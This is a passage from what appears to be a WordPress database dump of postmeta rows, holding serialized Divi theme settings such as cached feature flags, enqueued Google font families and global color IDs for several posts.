;i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33103,1155,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33104,1155,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33105,1155,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33098,1637,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33099,1646,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33100,1646,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33101,1646,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33080,542,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33081,542,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33082,542,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33094,1091,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33095,1637,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33096,1637,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33097,1637,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33090,1551,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33091,1091,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33092,1091,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33093,1091,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33086,1082,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33087,1551,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33088,1551,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33089,1551,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33083,1082,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33084,1082,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33085,1082,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33078,1656,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33079,542,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33072,1160,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33073,1160,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33074,1160,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33075,1656,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33076,1656,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33077,1656,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33070,527,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33071,1160,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33066,739,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33067,527,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33068,527,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33069,527,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33062,557,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33063,739,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33064,739,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33065,739,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33058,622,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33059,557,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33060,557,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33061,557,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33039,1054,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33040,1054,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33041,1230,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33042,1230,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33043,1230,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33044,1230,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i: